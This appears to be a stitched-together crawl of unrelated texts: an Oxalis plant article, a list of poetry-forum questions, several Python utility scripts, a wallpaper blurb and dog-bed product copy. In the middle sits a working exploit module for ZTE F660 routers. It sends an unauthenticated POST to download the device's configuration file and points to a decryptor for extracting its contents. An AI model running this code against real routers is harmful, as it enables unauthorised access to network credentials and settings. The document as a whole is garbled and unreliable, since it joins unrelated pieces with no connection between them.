Several Oxalis species dominate the plant life in local woodland ecosystems, be it Coast Range ecoregion of the North American Pacific Northwest, or the Sydney Turpentine-Ironbark Forest in southeastern Australia where least yellow sorrel (O. exilis) is common. In the United Kingdom and neighboring Europe, common wood sorrel (O. acetosella) is the typical woodland member of this genus, forming large swaths in the typical mixed deciduous forests dominated by downy birch (Betula pubescens) and sessile oak (Quercus petraea), by sycamore maple (Acer pseudoplatanus), common bracken (Pteridium aquilinum), pedunculate oak (Q. robur) and blackberries (Rubus fruticosus agg.), or by common ash (Fraxinus excelsior), dog's mercury (Mercurialis perennis) and European rowan (Sorbus aucuparia); it is also common in woods of common juniper (Juniperus communis ssp. communis). Some species – notably Bermuda-buttercup (O. pes-caprae) and creeping woodsorrel (O. corniculata) – are pernicious, invasive weeds when escaping from cultivation outside their native ranges; the ability of most wood-sorrels to store reserve energy in their tubers makes them quite resistant to most weed control techniques.
Tuberous woodsorrels provide food for certain small herbivores – such as the Montezuma quail (Cyrtonyx montezumae). The foliage is eaten by some Lepidoptera, such as the Polyommatini pale grass blue (Pseudozizeeria maha) – which feeds on creeping wood sorrel and others – and dark grass blue (Zizeeria lysimon).
Oxalis species are susceptible to rust (Puccinia oxalidis).
Wood sorrel (a type of oxalis) is an edible wild plant that has been consumed by humans around the world for millennia. In Dr. James Duke's Handbook of Edible Weeds, he notes that the native American Kiowa people chewed wood sorrel to alleviate thirst on long trips, the Potawatomi cooked it with sugar to make a dessert, the Algonquin considered it an aphrodisiac, the Cherokee ate wood sorrel to alleviate mouth sores and a sore throat, and the Iroquois ate wood sorrel to help with cramps, fever and nausea.
The fleshy, juicy edible tubers of the oca (O. tuberosa) have long been cultivated for food in Colombia and elsewhere in the northern Andes mountains of South America. It is grown and sold in New Zealand as "New Zealand yam" (although not a true yam), and varieties are now available in yellow, orange, apricot, and pink, as well as the traditional red-orange.
The leaves of scurvy-grass sorrel (O. enneaphylla) were eaten by sailors travelling around Patagonia as a source of vitamin C to avoid scurvy.
In India, creeping wood sorrel (O. corniculata) is eaten only seasonally, starting in December–January. The Bodos of north east India sometimes prepare a sour fish curry with its leaves. The leaves of common wood sorrel (O. acetosella) may be used to make a lemony-tasting tea when dried.
A characteristic of members of this genus is that they contain oxalic acid (whose name references the genus), giving the leaves and flowers a sour taste which can make them refreshing to chew. In very large amounts, oxalic acid may be considered slightly toxic, interfering with proper digestion and kidney function. However, oxalic acid is also present in more commonly consumed foods such as spinach, broccoli, brussels sprouts, grapefruit, chives, and rhubarb, among many others. General scientific consensus seems to be that the risk of sheer toxicity, actual poisoning from oxalic acid in persons with normal kidney function is "wildly unlikely".
While any oxalic acid-containing plant, such as Oxalis, is toxic to humans in some dosage, the U.S. National Institutes of Health note that oxalic acid is present in many foodstuffs found in the supermarket and its toxicity is generally of little or no consequence for people who eat a variety of foods.
In the past, it was a practice to extract crystals of calcium oxalate for use in treating diseases and as a salt called sal acetosella or "sorrel salt" (also known as "salt of lemon"). Growing oca tuber root caps are covered in a fluorescent slush rich in harmaline and harmine which apparently suppresses pests. Creeping wood sorrel and perhaps other species are apparently hyperaccumulators of copper. The Ming Dynasty text Precious Secrets of the Realm of the King of Xin from 1421 describes how O. corniculata can be used to locate copper deposits as well as for geobotanical prospecting. It thus ought to have some potential for phytoremediation of contaminated soils.
Several species are grown as pot plants or as ornamental plants in gardens, for example, O. versicolor.
Oxalis flowers range in colour from whites to yellows, peaches, pinks, or multi-coloured flowers.
Some varieties have double flowers, for example the double form of O. compressus. Some varieties are grown for their foliage, such as the dark purple-leaved O. triangularis.
Species with four regular leaflets – in particular O. tetraphylla (four-leaved pink-sorrel) – are sometimes misleadingly sold as "four-leaf clover", taking advantage of the mystical status of four-leaf clover.
Oxalis stricta [verification needed] – common yellow woodsorrel, common yellow oxalis, upright yellow-sorrel, lemon clover, "pickle plant", "sourgrass, "yellow woodsorrel"
^ "Oxalis". NC State University.
^ S. L. Nielsen, A. M. Simonsen (September 2011). "Photosynthesis and photoinhibition in two differently coloured varieties of Oxalis triangularis — the effect of anthocyanin content". Photosynthetica. 49 (3): 346–352. doi:10.1007/s11099-011-0042-y.
^ Mahr, Susan (March 2009). "Shamrocks, Oxalis spp". Master Gardener Program University of Wisconsin-Extension.
^ "Archived copy". Archived from the original on 2005-10-24. Retrieved 2005-10-18. CS1 maint: Archived copy as title (link) "Oxalic Acid Content of Selected Vegetables"
^ http://oxalicacidinfo.com/ "Sheer toxicity – actual poisoning – from ingested oxalic acid is wildly unlikely. The only foodstuff that contains oxalic acid at concentrations high enough to be an actual toxicity risk is the leaves – not the stalks, which is what one normally eats – of the rhubarb plant. (And you'd need to eat an estimated 11 pounds (5kg) of rhubarb leaves at one sitting for a lethal dose, though you'd be pretty sick with rather less.)"
^ http://dietary-supplements.info.nih.gov/factsheets/calcium.asp "Other components in food: phytic acid and oxalic acid, found naturally in some plants, bind to calcium and can inhibit its absorption. Foods with high levels of oxalic acid include spinach, collard greens, sweet potatoes, rhubarb, and beans. Among the foods high in phytic acid are fiber-containing whole-grain products and wheat bran, beans, seeds, nuts, and soy isolates. The extent to which these compounds affect calcium absorption varies. Research shows, for example, that eating spinach and milk at the same time reduces absorption of the calcium in milk. In contrast, wheat products (with the exception of wheat bran) do not appear to have a negative impact on calcium absorption. For people who eat a variety of foods, these interactions probably have little or no nutritional consequence and, furthermore, are accounted for in the overall calcium DRIs, which take absorption into account."
Wikimedia Commons has media related to Oxalis.
This page was last edited on 29 January 2019, at 13:51 (UTC). |
# Name:ZTE F660 remote config download
# File:f660_config_download.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 25.12.2015
# Last modified: 25.12.2015
# Shodan Dork:
# Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST
# Based on: https://www.exploit-db.com/exploits/36978/
import core.Exploit
import core.io
import requests
from interface.messages import print_error, print_success, print_warning, print_info
class Exploit(core.Exploit.RextExploit):
"""
Name:ZTE F660 remote config download
File:f660_config_download.py
Author:Ján Trenčanský
License: GNU GPL v3
Created: 25.12.2015
Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST
Based on: https://www.exploit-db.com/exploits/36978/
Options:
Name Description
host Target host address
port Target port
"""
def __init__(self):
core.Exploit.RextExploit.__init__(self)
def do_run(self, e):
url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)
try:
print_warning("Sending exploit")
# It took me longer than necessary to find out how to use Content-Disposition properly
# Always set stream=True otherwise you may not get the whole file
response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
if response.status_code == 200:
if response.headers.get('Content-Disposition'):
print_success("got file in response")
print_info("Writing file to config.bin")
core.io.writefile(response.content, "config.bin")
print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
except requests.ConnectionError as e:
print_error("connection error %s" % e)
except requests.Timeout:
print_error("timeout")
Exploit()
|
Ever met a Bat named Luc?
What the heck is a Scifaiku?
What will you think if the moon melted?
Ever feel hopeless? Not good enough?
The Most Evil Animal to have Graced the Land.?
A Pome - a fun thing. Do you share my secret vice?
How would you try to describe "cowboy poetry" ?
Is my poetry good or is it bad??
New Poem Please raead and tell me what u think please:?
I wrote this poem and I was wondering what people think?
My poem 'Reset' what do you think? ?
If a leaf falls in the water, does anyone listen?
How do a write a good poem?
Poems: edited haiku, do you like?
Have you ever been smitten by the beauty of a person?
Metaphorically speaking. Metaphorically Speaking? ?
Can u rate my poem piiiiiiiiz?
How would one describe brown eyes?
Critque My Poem: Whirl Wind of Love?
Rhyming Help, Whoever can rhyme plz help me out ???
What would the best poetic response be in this situation?
Do some of these things bother you too?
Have you ever heard a silent scream?
Who else loves this Poem?
Can this be taken as a poem?
I know I've asked this already, but I'm just looking for more opinions.
Anybody willing to lend an opinion? =)?
Hopelessness... Give Me A Poem...?
A Septolet, your comments and critique please?
My attempt at a Septolet, your comments please?
Your opinion on this poem i wrote ?
What say you to 'One Sad *ss Morning Pome?"?
What say about 'Another Space/Time Triviality'?
What do you think of my Con-verb about time and space?
Wat rhymes wth billion that isnt a #word or stupid?
Who can answer my Question about Space and Time?
There is a poem: The moons my constant mistress and the lovely owl my marrow?
Help find poems on parentχld relationships?
Poem - A Pensive Saturday - What Do You Think?
Should i hand this in to my teacher or not? thanks!?
New poem check it out rate it bash it do what ya want ?
Do I have talent is it any good.?
Poem that needs criticizing ?
In the real world could you compose 2 lines of meaningful Poetry?
Can you give me your comments and point of view on this poem?
Anyone who has any skill with poetry help I need it?
Family Relationship Poems-- WILL AWARD BEST ANSWER!!?
What are some good poems in trochaic meter?
Poems: Are these good haiku`s or not?
What do you think in this poem?
Thoughts on my poem, please?
A poem I wrote, feedback welcome :)?
NEW POEM! Please read and tell me what you think! Won't you?
Who ever feels like this rhyme?
Are there any Poetry Contests going on right now?
What do you have to say about this poem? ?
All opinions would be greatly appreciated?
Another Poem By Carl Walker Tell Me What You Think?
Can this really be true of the poet?
I wrote this poem...is it any good?
What Do You Think Of These Poems?? Be Honest Please?
Please help me finish up my poem?
What happens when something's missing?
Starfish can turn inside out, critique?
Is it true, you are what you Yeats?
What do you think about this song/poem?
Have you seen "The One I Love"? ?
Critique My Poem: I like You To Be Mine.?
What are some good poems about being depressed about love?
POEM:Can you guess what this haiku is about?
Another poem of thought provoking material?
A short poem of ponder evoking quality?
Do you like my poem? ?
What do you think about my poem? Honest but not to harsh please!?
How bad is this poem?
Would you please tell me how strange this actually is?
I revised my poem, please critique.?
I'm wrote a poem, will you critique?
POEM: How is this summer limerick?
Where can I send my poems and plays off so they can be critiqued?
Who is your favorite living American poet?
Do you sometimes take a break just to write a poem?
When you come across a great feast-meal, do you feel obligated to share?
Is my poetry good :X please read them?
A Con-Vert: How can there be a second final of anything?
I tried a Partenza Represa. Does it follow the rules?
I NEED A GOOD IM SORRY POEM!!!!!?
Have you ever walked this walk?
How is this Partenza Represa ?
How is this Partenza Represa? Did I do it right?
How often do you do heavy housecleaning?
Poem to a loved one on the other side of the world...does this sound ok?
Do you like breezy, lazy days and is this a Partenza Represa?
Have you woken up and seen things differently?
I made a new poem check it out ?
Poem I just wrote, what do you think? Criticism welcome. It's a bit long.?
Why do people usually write poetry when they feel unhappy?
Could you leave some feedback on this poem I've written.?
Is this a nautical theme? or a dream...?
Will the madness ever stop? I hope not...?
How can i find some beautiful urdu poetry on time !?
Help need to find poetry and quotes.?
What do you think about this funny poem?
Should i send this poem to my friend?
Check out my writing tell me what you think?
Would anyone care to critique or comment on this poem?
Poem I just wrote. What do you think? Criticism welcome.?
Any feedback on my poem? One of my longer ones.?
Can anyone find me the poem litany by john ashbury?
Grannyjill's Trigee - Do you like it?
Do you enjoy my poem? Could you tell me why or why not?
Any ideas for a "wisdom" poem?
DO U LIKE MY POEM???
Have you been there, have you?
Should i submit this to a poetry contest?
Are you free to misremember? Misquote? I'm on a roll now.?
How do you find this poem? Thoughts and feelings?
Do I have to ask? Thoughts and feelings?
Critique my poem: The Path of the Wayfarer...?
Isnt this a cute poem?
Is it alright if I try a Pertenza Ripresa?
Please make a SHORT POEM?
Another peom ,i want honest answers plz,,what doyou think?
Do you LIke This Pome Tell Me Why?
A Poem - Home Ownership - A pleasure or not?
What do you think of this poems?
A Bob M. Georgia limerick?
Are you feeling creative? Finish this poem....?
Hows this for a poem?!!?
Can you kindly think of a few nice phrases?
Please comment/interpret my poem 'Ogre'. It would mean alot. Thanks.?
Whats this kind of poem called?
Dr. Seuss-ish b-day poem needed?
Why are most of Burn's poem difficult to read...?
I need a good fifteen sentence portrait (type of poem)?
Poem....my best friends kemo...critique please!?
Sharing one of mine with you. What are your thoughts on my poem?
'the waste land' by t.s. eliot?
Would you please turn the light on?
TD or not TD. What is your question?
Is my mush mushier than your mush?
Who has come forth bearing no honor?
And what is compulsive about your behavior?
The devils been in your parlour ?
What do you think of my poems/short stories??
How's this for a love poem?
Have you ever been truly "Alone"? (Prose or Poetry?)?
Thunderstorms are...(fill in the blank)?
The limerick and Trigee have mated: care to see the baby?
How about Limerick number two?
Is this a Martian Limerick?
I just wrote this awhile ago i really like this one ?
What would you do if you were left at the dock? (Hydropro limerick)?
Is this a sea worthy Limerick?
Can you love too deeply?
How do you like this whatever you want to call it?
Is this an original form and how can I improve it?
Do you like this new Trigee?
What do think of this Trigee?
Which is sharper, the knife or the heart?
Do you keep careful records?
What sort of poem is this?
I have a poem, comments please.?
Can anyone tolerate a Semper Trigee?
Who has visited the "Old Folks Home" this week?
"Keepsake Vows" A poem for comment, who, what,why,when?
And what type of medication would you advise?
Another poem about my friend who passed away? (tell me what you think)?
Have you suffered from morning confusion?
Would you like read my poem? and comment?
Write one line for this poem ? ? ? ? ? ? ?
My Poem: Writers Block. Please review it.?
Do you remember your first prom date?
How do you like my Poem? ?
Do you like this silly pome for people who love spelling?
I wrote this poem.Do ya like it?
Have you ever seen a strange sky, and how do like your illumination?
What do you think or have to say about my poem?
What should be the title of this poem.?
What do you think about my poem.?? |
import ReactionMaker.inversion as inversion
import ReactionMaker.duplicate as duplicate
import ReactionMaker.increment as increment
import ReactionMaker.decrement as decrement
import ReactionMaker.multiply as multiply
import ReactionMaker.logarithm as logarithm
import ReactionMaker.power as power
import Simulator.XMLParser as XMLParser
def getHistoryFileName(xmlFileName):
y = xmlFileName[:-3]
return 'history_' + y + 'txt'
def printWelcomeMessage():
print "Welcome to the Chemical Computer world!!"
def executeInversion():
var = raw_input("Enter the value you want to invert: ")
return inversion.execute(var)
def executeDuplicate():
var = raw_input("Enter the value you want to duplicate: ")
return duplicate.execute(var)
def executeDecrement():
var = raw_input("Enter the value you want to decrement: ")
return decrement.execute(var)
def executeIncrement():
var = raw_input("Enter the value you want to increment: ")
return increment.execute(var)
def executeMultiply():
input1 = raw_input("Enter the value of input 1: ")
input2 = raw_input("Enter the value of input 2: ")
return multiply.execute(input1,input2)
def executeLogarithm():
var = raw_input("Enter the value you want to take logarithm of: ")
return logarithm.execute(var)
def executePower():
input1 = raw_input("Enter the value of base: ")
input2 = raw_input("Enter the value of exponent: ")
return power.execute(input1,input2)
def showMainMenu():
print "Enter your choice here: "
print "1: Basic Functions"
print "2: Advanced Functions"
print "3: Exit"
def showBasicFunctionsMenu():
print "Select any one of the below basic function"
print "1: Inversion"
print "2: Duplication/Copy"
print "3: Decrementation"
print "4: Incrementation"
def showAdvancedFunctionsMenu():
print "Select any one of the below advanced function"
print "1: Multiplication"
print "2: Logarithm"
print "3: Power"
def showInvalidMessageAndQuit():
print "Please select only one of the given choice"
print "Quitting the Chemical World ..."
quit()
def plotResults(xmlFile,chemicalList,timeOfSimulation):
historyFile = getHistoryFileName(xmlFile)
sim = XMLParser.getSimulator(xmlFile)
sim.simulate(timeOfSimulation,historyFile)
sim.plot(chemicalList)
def executeBasicFunction(userChoice):
outputFileName = ''
chemicalList = []
if userChoice == 1:
outputFileName,chemicalList = executeInversion()
elif userChoice == 2:
outputFileName,chemicalList = executeDuplicate()
elif userChoice == 3:
outputFileName,chemicalList = executeDecrement()
elif userChoice == 4:
outputFileName,chemicalList = executeIncrement()
else:
showInvalidMessageAndQuit()
print 'Result File ' + outputFileName + ' Created'
timeOfSimulation = int(raw_input('Enter Time Of Simulation: '))
plotResults(outputFileName,chemicalList,timeOfSimulation)
def executeAdvancedFunction(userChoice):
outputFileName = ''
chemicalList = []
if userChoice == 1:
outputFileName,chemicalList = executeMultiply()
elif userChoice == 2:
outputFileName,chemicalList = executeLogarithm()
elif userChoice == 3:
outputFileName,chemicalList = executePower()
else:
showInvalidMessageAndQuit()
print 'Result File ' + outputFileName + ' Created'
timeOfSimulation = int(raw_input('Enter Time Of Simulation: '))
plotResults(outputFileName,chemicalList,timeOfSimulation)
def executeUserChoice(userChoice):
if userChoice == 1:
showBasicFunctionsMenu()
userChoice = int(input())
executeBasicFunction(userChoice)
elif userChoice == 2:
showAdvancedFunctionsMenu()
userChoice = int(input())
executeAdvancedFunction(userChoice)
elif userChoice == 3:
print "Quitting the Chemical World ..."
quit()
else:
showInvalidMessageAndQuit()
def main():
printWelcomeMessage()
while True:
print ""
showMainMenu()
userChoice = int(input())
executeUserChoice(userChoice)
main() |
Chocolate Cherry Frosting is free HD wallpaper. This wallpaper was upload at April 21, 2019 upload by admin in .You can download it in your computer by clicking resolution image in Download by size:. Don't forget to rate and comment if you interest with this wallpaper. |
# -*- coding: utf-8 -*-
import os, sys
import time
import traceback
from dCore import *
class DamnLog:
def __init__(self, logpath=None, stderr=True, flush=False, handleerrors=True, overrides={}):
DamnLog.instance = self
self.time = 0
self.streams = []
self.autoflush = flush
self.overrides = {}
if logpath is not None:
try:
if not os.path.exists(os.path.dirname(logpath)):
os.makedirs(os.path.dirname(logpath))
f = DamnOpenFile(logpath, 'wb')
self.streams.append(f)
f.write((self.getPrefix() + u'Log opened.').encode('utf8'))
except:
try:
print 'Warning: Couldn\'t open log file!'
traceback.print_exc()
except:
pass
if stderr:
self.streams.append(sys.stdout)
if handleerrors:
try:
sys.excepthook = self.logException
except:
self.log('!! Cannot override excepthook. This looks bad.')
def getPrefix(self):
t = int(time.time())
if self.time != t:
self.time = t
return u'[' + DamnUnicode(time.strftime('%H:%M:%S')) + u'] '
return u''
def write(self, message):
message = u'\r\n' + (self.getPrefix() + DamnUnicode(message.strip())).strip()
for s in self.streams:
try:
print >> s, message.encode('utf8'),
except:
try:
print 'Could not print to stream', s,'message:', message.strip()
except:
pass
if self.autoflush:
self.flush()
def log(self, *args):
import dCore
s = []
for i in args:
i = dCore.DamnUnicode(i)
for k in self.overrides.iterkeys():
i = i.replace(k, self.overrides[k])
s.append(i)
return self.write(u' '.join(s))
def logException(self, typ, value, tb):
import traceback
import dCore
import dLog
try:
info = traceback.format_exception(typ, value, tb)
e = []
for i in info:
e.append(dCore.DamnUnicode(i).strip())
self.log('!!',u'\n'.join(e))
except:
try:
self.log('!! Error while logging exception. Something is very wrong.')
except:
pass # Something is very, very wrong.
def flush(self):
for s in self.streams:
try:
s.flush()
except:
pass
try:
os.fsync(s)
except:
pass
def close(self):
self.log('Closing log.')
for s in self.streams:
if s != sys.stderr:
try:
s.close()
except:
pass
def addOverride(target, replacement=u''):
self.overrides[DamnUnicode(target)] = DamnUnicode(replacement)
def Damnlog(*args):
if DamnLog.__dict__.has_key('instance'):
return DamnLog.instance.log(*args)
return None
def DamnlogException(*args):
if DamnLog.__dict__.has_key('instance'):
return DamnLog.instance.logException(*args)
return None
def DamnlogOverride(target, replacement=u''):
DamnLog.instance.addOverride(target, replacement)
|
The kinds of things you run across at 3:17 in the morning on the Internet.
Re: Funniest print on Thingiverse?
There are way too many bad jokes to build around that.
The funny part is there are 2608 downloads of that thing.
Must print (the first one!) ROFL! |
#!/usr/bin/env python
import os
import sys
import os.path as op
import mtpy.core.edi as MTedi
def main():
fn = sys.argv[1]
if not op.isfile(fn):
print('\n\tFile does not exist: {0}\n'.format(fn))
sys.exit()
saveplot = False
if len(sys.argv) > 2:
arg2 = sys.argv[2]
if 's' in arg2.lower():
saveplot = True
fn = plotedi(fn, saveplot)
def plotedi(fn, saveplot=False, component=None):
edi = MTedi.Edi()
try:
edi.readfile(fn)
except:
print('\n\tERROR - not a valid EDI file: {0}\n'.format(fn))
sys.exit()
# if saveplot is True:
# import matplotlib
# matplotlib.use('Agg')
import pylab
lo_comps = []
if component is not None:
'n' in component.lower()
try:
if 'n' in component.lower():
lo_comps.append('n')
except:
pass
try:
if 'e' in component.lower():
lo_comps.append('e')
except:
pass
if len(lo_comps) == 0:
lo_comps = ['n', 'e']
res_te = []
res_tm = []
phi_te = []
phi_tm = []
reserr_te = []
reserr_tm = []
phierr_te = []
phierr_tm = []
for r in edi.Z.resistivity:
res_te.append(r[0, 1])
res_tm.append(r[1, 0])
for p in edi.Z.phase:
phi_te.append(p[0, 1] % 90)
phi_tm.append(p[1, 0] % 90)
if pylab.np.mean(phi_te) > 90 and pylab.np.mean(phi_tm) > 90:
phi_te = [i % 90 for i in phi_te]
phi_tm = [i % 90 for i in phi_tm]
for r in edi.Z.resistivity_err:
reserr_te.append(r[0, 1])
reserr_tm.append(r[1, 0])
for p in edi.Z.phase_err:
phierr_te.append(p[0, 1])
phierr_tm.append(p[1, 0])
periods = 1. / edi.freq
resplotelement_xy = None
resplotelement_yx = None
axes = pylab.figure('EDI ' + fn)
ax1 = pylab.subplot(211)
if 'n' in lo_comps:
resplotelement_xy = pylab.errorbar(
periods, res_te, reserr_te, marker='x', c='b', fmt='x')
if 'e' in lo_comps:
resplotelement_yx = pylab.errorbar(
periods, res_tm, reserr_tm, marker='x', c='r', fmt='x')
pylab.xscale('log', nonposx='clip')
pylab.yscale('log', nonposy='clip')
minval = pylab.min(pylab.min(res_te, res_tm))
maxval = pylab.max(pylab.max(res_te, res_tm))
pylab.xlim(0.5 * pylab.min(periods), 2 * pylab.max(periods))
# ylim([0.1,100])
pylab.ylim([minval / 10, maxval * 10])
pylab.autoscale(False)
pylab.ylabel(r' $\rho$ (in $\Omega m$)')
pylab.setp(ax1.get_xticklabels(), visible=False)
# share x only
ax2 = pylab.subplot(212, sharex=ax1)
pylab.autoscale(False)
# ylim(-45,135)
if 'n' in lo_comps:
pylab.errorbar(periods, phi_te, phierr_te, marker='x', c='b', fmt='x')
if 'e' in lo_comps:
pylab.errorbar(periods, phi_tm, phierr_tm, marker='x', c='r', fmt='x')
pylab.ylabel('Phase angle ($\degree$)')
pylab.xlabel('Period (in s)')
pylab.plot([pylab.xlim()[0], pylab.xlim()[1]], [45, 45], '-.', c='0.7')
pylab.ylim([-0, 90])
ax1.legend([resplotelement_xy, resplotelement_yx], ['$E_{X}/B_Y$', '$E_Y/B_X$'], loc=2, ncol=1,
numpoints=1, markerscale=0.8, frameon=True, labelspacing=0.3,
prop={'size': 8}, fancybox=True, shadow=False)
pylab.tight_layout()
if saveplot is True:
pylab.ioff()
outfn = op.splitext(fn)[0] + '.png'
pylab.savefig(outfn, bbox_inches='tight')
pylab.close('all')
pylab.ion()
return outfn
else:
pylab.ion()
pylab.show(block=True)
return None
if __name__ == '__main__':
main()
|
You can also check Orthopedic 4" Dog Crate Pad by Big Barker - 36" x 24". Waterproof & Tear Resista and Dog Crate | MidWest Life Stages 36" Double Door Folding Metal Dog Crate | Divider Panel, Floor Protecting Feet, Leak-Proof Dog Tray | 36L x 24W x 27H Inches, Intermediate Dog Breed for a better comparison at Dog-bed.org.
Dog Bed Mattress Cat Plush Indoor Crate Modern Gray Details Comfortable Gray / cat fits 24L" dog crates and synthetic overstuffed "non-skid" on bottom surface of works pet / cats between Ombré nuetral gray color any décor maintenace / pet bed Description want to be a or a cat...), the Deluxe Ombré Swirl Bed for perfect pet bed for you! pet is in sizes that are perfectly breed of cat.
These neutral color (mocha complement home a place to rest.
All pet bottom hardwood or tile and they are sized. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.